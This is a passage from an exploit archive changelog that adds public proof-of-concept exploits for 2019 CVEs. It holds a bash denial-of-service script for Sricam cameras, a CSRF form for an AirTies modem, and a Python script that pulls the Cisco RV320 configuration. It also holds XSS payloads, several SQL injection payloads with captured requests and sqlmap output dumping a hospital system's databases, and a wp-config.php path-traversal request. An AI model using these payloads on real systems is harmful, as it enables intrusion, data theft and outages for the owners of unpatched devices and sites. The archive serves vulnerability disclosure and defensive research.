DB: 2019-01-29

26 changes to exploits/shellcodes

Sricam gSOAP 2.8 - Denial of Service
Smart VPN 1.1.3.0 - Denial of Service (PoC)
MySQL User-Defined (Linux) x32 / x86_64 - sys_exec Function Local Privilege Escalation
Easy Video to iPod Converter 1.6.20 - Buffer Overflow (SEH)
R 3.4.4 XP SP3 - Buffer Overflow (Non SEH)
BEWARD Intercom 2.3.1 - Credentials Disclosure
Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)

CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)
Rundeck Community Edition < 3.0.13 - Persistent Cross-Site Scripting
WordPress Plugin Ad Manager WD 1.0.11 - Arbitrary File Download
AirTies Air5341 Modem 1.0.0.12 - Cross-Site Request Forgery
LogonBox Limited / Hypersocket Nervepoint Access Manager - Unauthenticated Insecure Direct Object Reference
CMSsite 1.0 - 'cat_id' SQL Injection
CMSsite 1.0 - 'search' SQL Injection
Cisco RV300 / RV320 - Information Disclosure
Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting
Newsbull Haber Script 1.0.0 - 'search' SQL Injection
Care2x 2.7 (HIS) Hospital Information System - Multiple SQL Injection
Teameyo Project Management System 1.0 - SQL Injection
Mess Management System 1.0 - SQL Injection
MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting
ResourceSpace 8.6 - 'collection_edit.php' SQL Injection

Linux/x86 - exit(0) Shellcode (5 bytes)
Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (2)
Linux/ARM - Reverse TCP (/bin/sh) - 192.168.1.124:4321 Shellcode (64 bytes)
Linux/ARM -  Bind TCP (/bin/sh)-0.0.0.0:4321 Null Free Shellcode (84 bytes)

exploits/hardware/dos/46261.sh

@@ -0,0 +1,40 @@
+#!/bin/bash
+
+#######################################################################################
+#
+#     Exploit Title: Sricam gSOAP 2.8 - Denial of Service
+#              Date: 25/01/2019           
+#     Vendor Status: Informed (24/10/2018)
+#            CVE ID: CVE-2019-6973
+#    Exploit Author: Andrew Watson
+#           Contact: https://keybase.io/bitfu
+#  Software Version: Sricam gSOAP 2.8
+#   Vendor Homepage: http://www.sricam.com/
+#         Tested on: Sricam IP CCTV Camera running gSOAP 2.8 on TCP/5000
+#       PoC Details: Sricam IP CCTV Camera's are vulnerable to denial of service,
+#                    exploitable by sending multiple incomplete requests.
+#        References: https://github.com/bitfu/sricam-gsoap2.8-dos-exploit
+#
+#        DISCLAIMER: This proof of concept is provided for educational purposes only!
+#
+#######################################################################################
+
+
+if [ -z "$3" ]; then
+	echo "#############################################################################"
+	echo -e "[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu"
+	echo -e "\n[*] Usage: $0 <IP_Address> <Port> <#_DoS_Payloads>"
+	echo "[*] Example: $0 127.0.0.1 5000 10"
+	echo -e "\n[!] Each DoS payload sent adds another 20 seconds downtime.\n"
+	exit 0
+fi
+
+time=$(expr $3 \* 20)
+echo "[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu"
+echo -e "\n[+] Sending $3 DoS payloads..."
+echo "[+] Expected downtime: $time seconds"
+for dos in $(seq 1 $3); do
+netcat $1 $2 &
+done
+echo -e "\n[!] $dos DoS payloads sent to: $1:$2"
+echo

exploits/hardware/webapps/46253.html

@@ -0,0 +1,20 @@
+# Exploit Title: AirTies Air5341 1.0.0.12 Modem CSRF Exploit & PoC
+# Version: AirTies Modem Firmware 1.0.0.12
+# Tested on: Windows 10 x64
+# CVE : CVE-2019-6967
+# Author : Ali Can Gönüllü
+
+<html>
+<form method="POST" name="formlogin" action="
+http://192.168.2.1/cgi-bin/login" target="_top" id="uiPostForm">
+       <input type="hidden" id="redirect" name="redirect">
+       <input type="hidden" id="self" name="self">
+       <input name="user" type="text" id="uiPostGetPage" value="admin"
+size="">
+       <input name="password" type="password" id="uiPostPassword" size="">
+<input onclick="uiDologin();" name="gonder" type="submit"
+class="buton_text" id="__ML_ok" value="TAMAM"
+style="background-image:url(images/buton_bg2.gif); height:21px;
+width:110px; border: 0pt  none">
+      </form>
+      </html>

exploits/hardware/webapps/46262.py

@@ -0,0 +1,37 @@
+# Exploit Title: 6coRV Exploit
+# Date: 01-26-2018
+# Exploit Author: Harom Ramos [Horus]
+# Tested on: Cisco RV300/RV320
+# CVE : CVE-2019-1653
+
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+from fake_useragent import UserAgent
+
+def random_headers():
+    return dict({'user-agent': UserAgent().random})
+
+def request(url):
+    r = requests.Session()
+    try:
+        get =  r.get(url, headers = random_headers(), timeout = 5, verify=False)#, allow_redirects=False
+        if get.status_code == 200:  
+            return get.text    
+    except requests.ConnectionError:
+        return 'Error Conecting'
+    except requests.Timeout:
+	    return 'Error Timeout'
+    except KeyboardInterrupt:
+        raise    
+    except:
+        return 0
+
+print("")        
+print("##################################################")
+print("CISCO CVE-2019-1653 POC")
+print("From H. with love")
+print("")
+
+url = raw_input("URL> EX:http://url:port/ ") 
+url = url + "/cgi-bin/config.exp"
+print(request(url))

exploits/hardware/webapps/46263.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Cisco Firepower Management Center Cross-Site Scripting (XSS) Vulnerability
+# Google Dork: N/A
+# Date: 23-01-2019
+################################
+# Exploit Author: Bhushan B. Patil<https://www.exploit-db.com/?author=9551> (Exploit DB author ID: 9551)
+################################
+# Advisory URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-frpwr-mc-xss
+# Affected Version: 6.2.2.2 & 6.2.3
+# Cisco Bug ID: CSCvk30983
+# CVE: CVE-2019-1642
+
+1. Technical Description:
+A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of the affected software.
+The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected software. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.
+
+2. Proof Of Concept:
+Login to Cisco Firepower Management Center (FMC) and browse to Systems -> Configuration menu.
+https://<ip address>/platinum/platformSettingEdit.cgi?type=TimeSetting
+
+Append the following XSS payload >"><script>alert("XXS POC")</script>& in the URL
+
+The URL will become and on submitting it you'll get an alert popup.
+https://<ip address>/platinum/platformSettingEdit.cgi?type=>"><script>alert("XXS POC")</script>&
+
+3. Solution:
+Upgrade to version 6.3.0
+For more information about fixed software releases, consult the Cisco bug ID CSCvk30983<https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvk30983>
+
+4. Reference:
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-frpwr-mc-xss
+
+
+Thanks & Regards,
+
+Bhushan B. Patil
+Tech Specalist & Lead - Security Testing
+This e-mail and any attachments thereto may contain confidential information and/or information protected by intellectual property rights for the exclusive attention of the intended addressees named above. If you have received this transmission in error, please immediately notify the sender by return e-mail and delete this message and its attachments. Unauthorized use, copying or further full or partial distribution of this e-mail or its contents is prohibited. Although this e-mail and any attachments are believed to be free of any virus or other defect that may affect any computer system into which it is received and opened, it is the responsibility of the recipient to ensure that it is virus free. Paladion is not liable for any loss or damage arising in any way from the use of this e-mail or its attachments.

exploits/java/webapps/46251.txt

@@ -0,0 +1,45 @@
+# Exploit Title:  Rundeck Community Edition before 3.0.13 Multiple Stored
+XSS
+# Vendor Homepage: https://www.rundeck.com/open-source
+# Software Link: https://docs.rundeck.com/downloads.html
+# Exploit Author: Ishaq Mohammed
+# Contact: https://twitter.com/security_prince
+# Website: https://about.me/security-prince
+# Category: webapps
+# Platform: Java
+# CVE: CVE-2019-6804
+
+1. Description:
+Cross-Site Scripting issues affecting multiple fields in the workflow
+module under job edit form by injecting javascript code in the Arguments,
+Invocation String, and File Extension field, the input from these fields
+are rendered in the Execution Preview which is the sink of this
+vulnerability.
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6804
+
+2. Proof of Concept:
+Vulnerable Endpoints / Systems
+http://{Rundeck_hostname}/project/{Jobname}/job/edit/{Job_ID}
+Steps to Reproduce:
+Login to Rundeck Server with valid credentials.
+1. Navigate to any project in the instance.
+2. Navigate to the jobs module
+3. Select a job
+4. From the right hand side drop down menu, select edit this job
+5. Navigate to Workflow module
+6. Scroll down to arguments field
+7. Enter the following payload: <img/src="x"onerror=alert(19)
+8. The same payload can be entered in the Advanced mode in the same module
+in two other fields "Invokation String" and "File Extension"
+9. Observe the payload getting executed in the "Execution Preview"
+
+3. Solution:
+The issue is now patched by the vendor in version 3.0.13
+https://docs.rundeck.com/docs/history/version-3.0.13.html
+https://github.com/rundeck/rundeck/issues/4406
+
+-- 
+Best Regards,
+Ishaq Mohammed
+https://about.me/security-prince

exploits/multiple/webapps/46254.txt

@@ -0,0 +1,21 @@
+# Exploit Title: Access Manager Unauthenticated Insecure Direct Object Reference (IDOR)
+# Google Dork: /runJob.html?jobId=<#>
+# Date: 01/22/2019
+# Exploit Author: 0v3rride
+# Vendor Homepage: https://docs.logonbox.com/index.html
+# Software Link: N/A
+# Version: >= 1.2 <= 1.4-RG3
+# Tested on: Linux/Apache Wicket
+# CVE: 2019-6716
+
+Summary of issue submitted to CVE MITRE:
+An unauthenticated Insecure Direct Object Reference (IDOR) vulnerability in LogonBox Limited's (formerly Nervepoint Technologies) Access Manager web application allows a remote attacker to enumerate internal Active Directory usernames. It also allows for the possibility to enumerate Active Directory group names and altering of back-end server jobs (backup and synchronization jobs) depending on the configuration of the system. This is done via the manipulation of the jobId HTTP parameter in an HTTP GET request. This issue affects Access Manager versions >= 1.2 <= 1.4-RG3 and has been rectified in versions >= 1.4-RG4.
+
+PoC examples:
+https://host.example.org/runJob.html?jobId=<#>
+
+E.g.
+https://host.example.org/runJob.html?jobId=5
+
+
+0v3rride

exploits/php/webapps/46252.txt

@@ -0,0 +1,35 @@
+Exploit Title: WordPress Plugin ad manager wd v1.0.11 - Arbitrary File
+Download
+Google Dork: N/A
+Date: 25.01.2019
+Vendor Homepage:
+https://web-dorado.com/products/wordpress-ad-manager-wd.html
+Software: https://wordpress.org/plugins/ad-manager-wd
+Version: 1.0.11
+Tested on: Win7 x64,
+
+Exploit Author: 41!kh4224rDz
+Author Mail : scanweb18@gmail.com
+
+Vulnerability:
+wp-content\plugins\ad-manager-wd\wd_ads_admin_class.php
+
+   30/  if (isset($_GET['export']) && $_GET['export'] == 'export_csv')
+
+   97/   $path = $_GET['path'];
+           header('Content-Description: File Transfer');
+           header('Content-Type: application/octet-stream');
+           header('Content-Transfer-Encoding: binary');
+           header('Expires: 0');
+           header('Cache-Control: must-revalidate, post-check=0,
+pre-check=0');
+            header('Pragma: public');
+
+           header('Content-Type: text/csv; charset=utf-8');
+           header('Content-Disposition: attachment; filename=' .
+basename($path));
+
+           readfile($path);
+ Arbitrary File Download/Exploit :
+
+http://localhost/wordpress/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php

exploits/php/webapps/46259.txt

@@ -0,0 +1,23 @@
+# Exploit Title: CMSsite 1.0 - SQL injection
+# Exploit Author : Majid kalantari (mjd.hack@gmail.com)
+# Date: 2019-01-27
+# Vendor Homepage : https://github.com/VictorAlagwu/CMSsite
+# Software link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
+# Version: 1.0
+# Tested on: Windows 10
+# CVE: N/A
+===============================================
+
+# vulnerable file: category.php
+# vulnerable parameter : cat_id
+
+if (isset($_GET['cat_id'])) {
+    $category = $_GET['cat_id'];
+}
+$query = "SELECT * FROM posts WHERE post_category_id=$category";
+$run_query = mysqli_query($con, $query);
+
+# payload : http://127.0.0.1/cm/category.phpcat_id=7 UNION SELECT
+1,2,user(),3,4,5,6,7,8,9,10%23
+
+===============================================

exploits/php/webapps/46260.txt

@@ -0,0 +1,24 @@
+# Exploit Title: CMSsite 1.0 - 'search' SQL injection
+# Exploit Author : Majid kalantari (mjd.hack@gmail.com)
+# Date: 2019-01-27
+# Vendor Homepage : https://github.com/VictorAlagwu/CMSsite
+# Software link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
+# Version: 1.0
+# Tested on: Windows 10
+# CVE: N/A
+===============================================
+
+# vulnerable file: search.php
+# vulnerable parameter : POST - search
+
+if (isset($_POST['submit'])) {
+    $search = $_POST["search"];
+}
+$query = "SELECT * FROM posts WHERE post_tags LIKE '%$search%' AND
+post_status='publish'";
+$search_query = mysqli_query($con, $query);
+
+# payload on search text box: ' and
+extractvalue(1,concat(':',database(),':'))#
+
+===============================================

exploits/php/webapps/46266.txt

@@ -0,0 +1,97 @@
+####################################################################
+
+# Exploit Title: Newsbull Haber Script - SQL Injection (Time Based)
+# Dork: N/A
+# Date: 28-01-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: http://newsbull.org/
+# Software Link: https://github.com/gurkanuzunca/newsbull
+# Version: 1.0.0
+# Category: Webapps
+# Tested on: Wampp @Win
+# CVE: N/A
+
+####################################################################
+
+# Vulnerabilities
+# For the SQL injection to be applied, the user must log in.
+# Running the injection command in the POC section will display the db data.
+# The proof of the deficit is in the link below.
+# https://i.hizliresim.com/zj0Q77.jpg
+
+####################################################################
+
+# POC - SQLi (Time Based)
+# Parameters : search
+# Attack Pattern : -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
+# GET Request :
+http://localhost/[PATH]/admin/comment/records?userId=1&search=1'[SQL]
+# URL : http://localhost/[PATH]/admin/comment/records?userId=1&search=-1'
+or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
+
+####################################################################
+
+
+####################################################################
+
+# Exploit Title: Newsbull Haber Script 1.0.0 - SQL Injection
+# Dork: N/A
+# Date: 28-01-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: http://newsbull.org/
+# Demo Page : http://newsbull.gurkanuzunca.com/
+# Software Link: https://github.com/gurkanuzunca/newsbull
+# Version: 1.0.0
+# Category: Webapps
+# Tested on: Wampp @Win
+# CVE: N/A
+
+####################################################################
+
+# Vulnerabilities
+# For the SQL injection to be applied, the user must log in.
+# Running the injection command in the POC section will display the db data.
+# The proof of the deficit is in the link below.
+# https://i.hizliresim.com/LlOBQz.jpg
+
+####################################################################
+
+# POC - SQLi (Blind)
+# Parameters : search
+# Attack Pattern : -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
+# GET Request : http://localhost/newsbull/admin/category/records?search=1'[SQL]
+# GET Request : http://localhost/newsbull/admin/news/records?search=1' [SQL]
+# URL : http://localhost/newsbull/admin/category/records?search=-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
+
+####################################################################
+
+####################################################################
+
+# Exploit Title: Newsbull Haber Script - (Boolean) SQL Injection
+# Dork: N/A
+# Date: 28-01-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: http://newsbull.org/
+# Software Link: https://github.com/gurkanuzunca/newsbull
+# Version: 1.0.0
+# Category: Webapps
+# Tested on: Wampp @Win
+# CVE: N/A
+
+####################################################################
+
+# Vulnerabilities
+# For the SQL injection to be applied, the user must log in.
+# Running the injection command in the POC section will display the db data.
+# The proof of the deficit is in the link below.
+# https://i.hizliresim.com/LlOBQz.jpg
+
+####################################################################
+
+# POC - SQLi (Boolean Based)
+# Parameters : search
+# Attack Pattern : ' OR 1=1 OR 'cw'='cw 
+# GET Request : http://localhost/newsbull/admin/menu/childs/5?search=1'[SQL]
+# URL : http://localhost/newsbull/admin/menu/childs/5?search=' OR 1=1 OR 'cw'='cw
+
+####################################################################

exploits/php/webapps/46268.txt

@@ -0,0 +1,85 @@
+# Exploit Title: Care2x 2.7  (HIS) Hospital Information system - Multiples SQL Injection
+# Date: 01/17/2019
+# Software Links/Project: https://github.com/care2x/care2x | http://www.care2x.org/
+# Version: Care2x 2.7
+# Exploit Author: Carlos Avila
+# Category: webapps
+# Tested on: Windows 8.1 / Ubuntu Linux
+# Contact: http://twitter.com/badboy_nt
+
+1. Description
+  
+Care2x is PHP based Hospital Information system, It features complete clinical flow management, laboratory management, patient records, multi-user support with permissions, stock management and accounting and billing management, PACS integration and DICOM viewer. Care2x provides some other features as CCTV integration which has not been seen in other open source HIS.
+
+This allows unauthenticated remote attacker to execute arbitrary SQL commands and obtain private information. Admin or users valid credentials aren't required. In a deeper analysis other pages are also affected with the vulnerability over the same input.
+
+It written in PHP version 5.x, it is vulnerable to SQL Injection. The parameter on cookie 'ck_config' is vulnerable on multiples URLS occurrences, explains to continue:
+
+http://192.168.0.108/main/login.php [parameter affected: ck_config cookie] (without authentication)
+
+
+	/main/indexframe.php [parameter affected: ck_config cookie]
+	/main/op-doku.php [parameter affected: ck_config cookie]
+	/main/spediens.php [parameter affected: ck_config cookie]
+	/modules/ambulatory/ambulatory.php [parameter affected: ck_config cookie]
+	/modules/fotolab/fotolab_pass.php [parameter affected: ck_config cookie]
+	/modules/laboratory/labor.php [parameter affected: ck_config cookie]
+	/modules/med_depot/medlager.php [parameter affected: ck_config cookie]
+	/modules/news/headline-read.php [parameter affected: nr parameter]
+	/modules/news/newscolumns.php [parameter affected: dept_nr parameter]
+	/modules/news/start_page.php [parameter affected: sid cookie]
+	/modules/nursing/nursing-fastview.php [parameter affected: ck_config cookie]
+	/modules/nursing/nursing-fastview.php [parameter affected: currYear parameter]
+	/modules/nursing/nursing-patient-such-start.php [parameter affected: ck_config cookie]
+	/modules/nursing/nursing-schnellsicht.php [parameter affected: ck_config cookie]
+	/modules/registration_admission/patient_register_pass.php [parameter affected: ck_config cookie]
+
+
+2. Proof of Concept
+
+GET /main/login.php?ntid=false&lang=en HTTP/1.1
+Host: 192.168.0.108
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.108/main/indexframe.php?boot=1&mask=&lang=en&cookie=&sid=6fclqapl9gsjhrcgoh3q0la5sp
+Connection: close
+Cookie: sid=6fclqapl9gsjhrcgoh3q0la5sp; ck_sid6fclqapl9gsjhrcgoh3q0la5sp=m14AAA%3D%3D%23WVUYpUnF%2Fo28ZWY45A5Sh9HMvr%2FZ8wVabFY%3D; ck_config=CFG5c414492459f90.28518700%201547781266
+Upgrade-Insecure-Requests: 1
+
+
+root@kali19:~#sqlmap -r SQLI-CARE2X --dbms mysql -f -v 2 --level 3 -p ck_config
+
+
+[14:18:15] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
+[14:18:15] [INFO] testing MySQL
+[14:18:16] [INFO] confirming MySQL
+[14:18:19] [INFO] the back-end DBMS is MySQL
+[14:18:19] [INFO] actively fingerprinting MySQL
+[14:18:20] [INFO] executing MySQL comment injection fingerprint
+[14:18:33] [DEBUG] turning off reflection removal mechanism (for optimization purposes)
+web server operating system: Linux Ubuntu
+web application technology: Nginx 1.14.0
+back-end DBMS: active fingerprint: MySQL >= 5.7
+               comment injection fingerprint: MySQL 5.7.24
+
+
+root@kali19:~#sqlmap -r SQLI-CARE2X --dbms mysql -v 2 --level 3 -p ck_config --dbs
+
+[20:09:33] [INFO] fetching database names
+[20:09:33] [INFO] the SQL query used returns 4 entries
+[20:09:33] [INFO] retrieved: information_schema
+[20:09:33] [INFO] retrieved: care2x
+[20:09:33] [DEBUG] performed 10 queries in 0.20 seconds
+available databases [2]:
+[*] care2x
+[*] information_schema
+[*] performance_schema
+[*] mysql
+
+
+
+3. Solution:
+
+Application inputs must be validated correctly in all developed classes.

exploits/php/webapps/46270.txt

@@ -0,0 +1,96 @@
+# Exploit Title: Teameyo - Project Management System 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-28
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.teameyo.com/
+# Software Link: https://codecanyon.net/item/teameyo-project-management-system/23142804
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/messages.php?project_id=[SQL]
+# 
+
+GET /[PATH]/messages.php?project_id=-48%27%20union%20select%20(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)--%20- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Cookie: PHPSESSID=1ug6oq40f09kft3jqncc4pco71
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Server: nginx
+Date: Sun, 27 Jan 2019 17:29:54 GMT
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+X-Powered-By: PHP/7.2.14, PleskLin
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/client/download_pdf.php
+# 
+
+POST /[PATH]/client/download_pdf.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 340
+Cookie: PHPSESSID=1ug6oq40f09kft3jqncc4pco71
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+milestone_id=%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c(SELECT(@x)FROM(SELECT(@x: =0x00),(@NR
+HTTP/1.1 200 OK
+Server: nginx
+Date: Sun, 27 Jan 2019 17:37:03 GMT
+Content-Type: application/pdf
+Transfer-Encoding: chunked
+Connection: keep-alive
+Cache-Control: private, must-revalidate, post-check=0, pre-check=0, max-age=1
+Pragma: public
+Expires: Sat, 26 Jul 1997 05:00:00 GMT
+Last-Modified: Sun, 27 Jan 2019 17:37:03 GMT
+Content-Disposition: inline; filename="invoice.pdf"
+X-Powered-By: PHP/7.2.14, PleskLin
+
+# POC: 
+# 3)
+# http://localhost/[PATH]/forgot-password.php 
+# 
+
+POST /[PATH]/forgot-password.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 298
+Cookie: PHPSESSID=1ug6oq40f09kft3jqncc4pco71
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+email=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&forgot-password=FORGET%2BPASSWORD: undefined
+HTTP/1.1 200 OK
+Server: nginx
+Date: Sun, 27 Jan 2019 17:44:33 GMT
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+X-Powered-By: PHP/7.2.14, PleskLin

exploits/php/webapps/46271.txt

@@ -0,0 +1,67 @@
+# Exploit Title: Mess Management System 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-28
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.m.testbd.xyz/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/biddut/ms_0.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/index.php?mod=admin&pg=admin_form&id=[SQL]
+# 
+
+GET /[PATH]/index.php?mod=admin&pg=admin_form&id=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=6bpo344k5sbed3vd2lc6tlgh80
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Type: text/html
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Vary: Accept-Encoding
+Server: Microsoft-IIS/8.0
+X-Powered-By: ASP.NET
+X-Powered-By-Plesk: PleskWin
+Date: Sat, 26 Jan 2019 21:31:38 GMT
+Transfer-Encoding: chunked
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/index.php?mod=BazarList&pg=BazarList_view
+# 
+
+POST /[PATH]/index.php?mod=BazarList&pg=BazarList_view HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 228
+Cookie: PHPSESSID=6bpo344k5sbed3vd2lc6tlgh80
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+qcari=%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%34%20%2d%2d%20%2d: undefined
+HTTP/1.1 200 OK
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Type: text/html
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Vary: Accept-Encoding
+Server: Microsoft-IIS/8.0
+X-Powered-By: ASP.NET
+X-Powered-By-Plesk: PleskWin
+Date: Sat, 26 Jan 2019 21:33:39 GMT
+Transfer-Encoding: chunked

exploits/php/webapps/46273.txt

@@ -0,0 +1,27 @@
+# Exploit Title: MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting
+# Date: 1/25/2018
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=1213
+# Version: 1.0.2
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2019-6979
+
+
+1. Description:
+This plugin keeps a record of a users IP & User-Agent history. The User-Agent isn't sanitized to user input allowing for an XSS via ACP.
+ 
+
+2. Proof of Concept:
+
+- Change your User-Agent to a payload   <script>alert('XSS')</script>
+- Log into an account
+
+When admin visits the IP/User-Agent history page the payload will execute
+http://localhost/[path]/admin/index.php?module=tools-ip_history_logs
+
+
+
+3. Solution:
+Update to 1.0.3

exploits/php/webapps/46274.txt

@@ -0,0 +1,84 @@
+# Exploit Title: ResourceSpace <=8.6 'collection_edit.php' SQL Injection
+# Dork: N/A
+# Date: 2019-01-25
+# Exploit Author: dd_ (info@malicious.group)
+# Vendor Homepage: https://www.resourcespace.com/
+# Software Link: https://www.resourcespace.com/get
+# Version: Stable release: 8.6
